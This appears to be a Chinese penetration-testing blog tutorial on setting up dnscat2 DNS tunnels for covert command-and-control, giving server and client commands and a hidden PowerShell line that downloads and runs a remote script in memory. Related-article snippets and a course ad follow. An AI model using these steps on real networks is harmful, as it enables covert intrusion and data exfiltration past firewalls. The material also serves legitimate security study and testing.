【渗透测试笔记】之【内网渗透——应用层隧道(DNS隧道:dnscat2的使用(域名连接(1)

最新推荐文章于 2024-07-23 23:50:48 发布
最新推荐文章于 2024-07-23 23:50:48 发布
阅读量398 收藏 10
点赞数 6
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970069/article/details/138793564
版权

1 服务器端环境部署

1.1 部署域名解析

如果要通过域名的方式访问那么久必须部署域名解析,直连方式则跳过此步骤。

1.1.1 创建A记录

创建一个A记录,ns1.xxx.xxx指向vps ip地址。
在这里插入图片描述
查看是否生效:
在这里插入图片描述

1.1.2 创建NS记录

创建一个NS记录dnstunnel.xxx.xxx指向ns1.xxx.xxx。
在这里插入图片描述

1.2 安装dnscat2服务器

在vps部署dnscat2服务器:

apt-get install gem ruby-dev libpq-dev ruby-bundler git -y
# 安装相关依赖

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install
# 安装dnscat2

在这里插入图片描述

1.3 启动服务器

有两种方式,一直是通过域名访问方式。另一种为直连方式,即直接访问ip。

1.3.1 域名连接方式
ruby dnscat2.rb dnstunnel.xxx.xxx -e open -c aa8j --no-cache


-e  :规定安全级别。open表示允许客户端不加密。
-c  :连接密码
--no-cache  :禁止缓存

在这里插入图片描述

1.3.2 直连方式
ruby dnscat2.rb --dns server=127.0.0.1,port=53,type=TXT --script=aa8j


port  :指定vps侦听端口
script  :指定连接密码

2 客户端部署

2.1 安装dnscat2客户端

如果是Linux:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

如果是windows:
下载链接:https://downloads.skullsecurity.org/dnscat2/

2.2 连接服务器

2.2.1 访问测试及错误处理

首先测试是否能成功访问:

./dnscat --ping dnstunnel.xxx.xxx

在这里插入图片描述
在这里插入图片描述

注意,如果遇到如以下[[ ERROR ]] :: DNS: RCODE_SERVER_FAILURE的情况:
在这里插入图片描述
先尝试清空dns缓存或更换dns服务器等方式,让nslookup域名解析到正确地址:

nslookup ns1.xxx.xxx

在这里插入图片描述

2.2.2 域名连接方式

Linux下:

./dnscat --dns domain=dnstunnel.xxx.xxx --secret aa8j

看到返回Session established!字样代表成功创建了session。
在这里插入图片描述
此时来到服务器上,也会看到成功创建的session号为1:
在这里插入图片描述
windows下同理:
在这里插入图片描述
在这里插入图片描述

2.2.3 直连方式
./dnscat --dns server=<vps_ip_address>,port=53,type=TXT --secret=aa8j

效果一样,不再演示。

2.2.4 powershell连接

在windows下还可以使用powershell连接,脚本下载地址:https://github.com/AA8j/SecTools/tree/main/dnscat2

方式一:导入方式

Import-Module .\dnscat2.ps1
start-Dnscat2 -Domain dnstunnel.xxx.xxx -DNSServer 8.8.8.8

方式二:内存加载方式

powershell.exe -nop -w hidden-c {IEX(New-Object System.Net.Webclient).Downloading('https://raw.githubusercontent.com/AA8j/SecTools/main/dnscat2/dnscat2.ps1');Start-Dnscat2 -Domain dnstunnel.xxx.xxx -DNSServer 8.8.8.8}

## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/79e53b09f33186e09543173837b02b5b.png)

![img](https://img-blog.csdnimg.cn/img_convert/d020b940fd561b4c7cb0b843ee018c20.png)

![img](https://img-blog.csdnimg.cn/img_convert/efcaca303e63935efac0581e913c6c37.png)

![img](https://img-blog.csdnimg.cn/img_convert/a0d19d29bbd8ada6151c0d864774f43d.png)

![img](https://img-blog.csdnimg.cn/img_convert/6561ba3c554b2d744c660566385de505.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84970069
关注
专栏目录
使用DNS进行命令控制(dnscat2)
谢公子的博客
02-21 6021
目录 dnscat2 搭建dnscat2隧道步骤 (1):部署域名解析 (2):安装dnscat2服务端 (3):在目标主机上安装dnscat2客户端 (4):测试客户端服务端是否连通 中继模式建立隧道 执行命令 dnscat2 dnscat2是一款开源软件,使用DNS协议创建加密的C&C通道,通过预共享密钥进行身份验证;使用Shell及DNS查询类型(TXT、MX...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 351
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透测试笔记】之【内网渗透——应用层隧道DNS隧道dnscat2的使用域名连接、直连、powershell连接))】
AA8j的博客
10-26 2472
文章目录1 服务器端环境部署1.1 部署域名解析1.1.1 创建A记录1.1.2 创建NS记录1.2 安装dnscat2服务器1.3 启动服务器1.3.1 域名连接方式1.3.2 直连方式2 客户端部署2.1 安装dnscat2客户端2.2 连接服务器2.2.1 访问测试及错误处理2.2.2 域名连接方式2.2.3 直连方式2.3 服务端常用命令2.3.1 获取一个shell2.3.2 打开一个程序 1 服务器端环境部署 1.1 部署域名解析 如果要通过域名的方式访问那么久必须部署域名解析,直连方式则跳过此
阿一课代表今日分享之使用dnscat2 进行dns隧道反弹shell(直连模式linux对linux)
qq_69775412的博客
07-10 981
Dns解析过程:系统发出dns解析之前会先看看本地是否保存了相关域名的解析,系统检测到hosts文件中没有响应的域名解析的时候会发送给本地dns解析服务器进行解析,解析之前会看看缓存中是否存在,如果没有,再将解析请求发给下一个dns服务器。gem install bundler 是一个在 Ruby 环境中使用的命令,用于安装 Bundler 这个 gem(gem 是 Ruby 的包管理器)Bundler 是一个帮助管理 Ruby 项目依赖的工具,它可以确保你的项目在不同的环境中使用相同版本的 gems。
内网渗透DNS隧道搭建
蚁景网安学院
08-26 1034
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 本文作者:D1m0n 前言 年初有幸参加了一次hvv,我主要负责内网渗透的部分,包括代理搭建,横向移动等等。那个时候,也是刚刚接触内网没两个月,赶鸭子上架的学了一下就上了战场。好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都.
内网渗透系列:内网隧道DNS隧道
闵行小鱼塘
07-07 4484
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习DNS隧道
DNS隧道工具』— dnscat2
热门推荐
localhost01
01-22 1万+
一、入坑必读 1、简介 Dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell…… 使用热度: ★★★★☆ 2、专业词 主控机:黑客方 被控机:受害者 Type:DNS解析的类型,常见的有:A、CNAME、MX、TXT…… 3、放哪儿 主控机 被控机 ......
内网安全学习(七)---域横向:隧道、网络&传输&应用层协议
qi_SJQ_的博客
02-17 1222
域横向网络 & 传输 & 应用层隧道技术 1.前置知识: 1)代理和隧道技术区别: 代理主要是解决访问问题,而隧道用于在数据通信被拦截的情况下封装改变通信协议进行绕过拦截。 2)具体介绍: 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统(ips/ids)来检查对外连接情况,如果发现异样,就会对通信进行阻断。 那么什么是隧道呢? 这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。
渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息
yjwangan的博客
11-24 2383
域名(Domain Name),简称域名、网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)DNS(域名系统,Domain Name System)是互联网的一项服务它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网顶尖域名二级域名三级域名.combaidu.com政府域名商业域名教育域名.gov.com.edu子域名指二级域名,二级域名是顶级域名(一级域名)的下一级。
螣龙安科笔记内网渗透测试(三)
katekatezzzzz的博客
05-27 1472
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程。 (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫描工具 web应用漏洞扫描器:用于web项目的安全测试工具,扫描网站所有url,自动测试是否存在各种类型的漏洞。如:AWVS、appscan 综合漏洞扫描器:集合了多种功能的漏洞扫描器。如Fux iscanner,具有如下功能:漏洞检测和管理,验证测试程序,IT资产发现和管理,端口扫描器,子域扫描器
Web渗透笔记.pdf
08-04
本资源摘要信息为 Web 渗透笔记.pdf 的知识点总结,涵盖了 Web 渗透测试的整个过程,包括信息收集、漏洞利用、权限提升、权限维持、内网代理、内网收集、内网漏洞、横向移动、跨域攻击等方面。 信息收集 信息收集...
dnscat2.zip
05-17
dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell……
【工具使用应用层DNS协议工具---dnscat2
做自己喜欢的事,并将其发挥到极致!
12-15 3072
0x01 DNS介绍 DNS域名系统(Domain Name System)的缩写,是因特网的一项核心服务,它作为可以将域名和IP地址相互映射的一个分布式数据库,能够使人更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。 DNS的记录类型有很多,有 A,AAAA,CNAME,MX,SOA,NS 等; DNS的解析过程可以分为两种类型:迭代查询和递归查询。通常本机到Local DNS Server的过程属于递归查询,而Local DNS Server对查询域名的解析过程属于迭代查询。为了减轻L
dnscat2搭建dns隧道
weixin_44110913的博客
03-06 1657
域名购买网站:https://dcc.godaddy.com/ 购买域名,并且注册网站,应用该模块 安装服务端: apt-get install gem apt-get install ruby-dev apt-get install libpq-dev cd dnscat2/server git clone https://github.com/iagox86/dnscat2.git 编译 bundle install 中继模式启动服务端 sudo ruby ./dnscat2.rb vpn.xxx -e
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 372
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
dns隧道dnscat2(无域名操作)
来到了学渣的博客
06-10 1740
如果主机可以解析域名,或者通过ping来指向IP,那么也可以尝试通过DNS协议传输内部网的通信。 先留个坑,因为没有域名所以用ip作为实验,知道操作的一个过程,后面继续完善 环境准备 server端(攻击端ip:192.168.10.144): root@kali:~# apt-get update root@kali:~# apt-get -y install ruby-dev git make g++ root@kali:~# gem install bundler root@kali:~# git c
内网渗透DNS隧道上线&DNS隧道通讯&SSH隧道&Linux上线CS
最新发布
2301_76227305的博客
07-23 1139
记录一下最近学的隧道知识,虽然DNS隧道上线和通讯我没有复现成功。希望有大佬看到此文章,能指点一二,有偿答谢。
centos查看dns缓存_dnscat2搭建dns隧道
weixin_33279929的博客
01-01 719
说明dnscat2可用来搭建dns隧道。地址:https://github.com/iagox86/dnscat2。分为客户端和服务端,客户端运行在受害机,服务端运行在攻击机。dns隧道分为两种,一种是直连模式,就是dns通信受害机直接连接自己的服务器。另外一种就是非直连的(也叫中继模式),受害机会先去请求互联网上的dns服务器,最后再指向指定的服务器(也就是自己攻击机)。区别在于直连模...
基于dnscat2的DNS隧道研究
ailx10
05-06 750
最近准备研究一下DNS隧道,网上的案例比较多,总的来说都需要花钱,毕竟域名+vps服务器,都是真金白银,为了做这个实验,我也是花了200块钱。一般来说,dns隧道有2种:直连和迭代。直连的dns隧道,就是你自己要有一台外网dns服务器,比如基于bind9搭建一个dns服务器,这种模式容易造成C&C(DNS)服务器的地址泄漏,现在基本上没人用了。迭代模式,可以依靠任意一台dns服务,然后依靠...
BackTrack渗透测试实战教程:学习笔记与Metasploit详解
"BackTrack渗透测试学习笔记是一份由IceSn0w编写的教程,旨在帮助读者深入了解和学习BackTrack在渗透测试中的应用。BackTrack是一款著名的开源网络安全工具集,主要用于进行渗透测试和网络安全评估。该笔记并非专业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值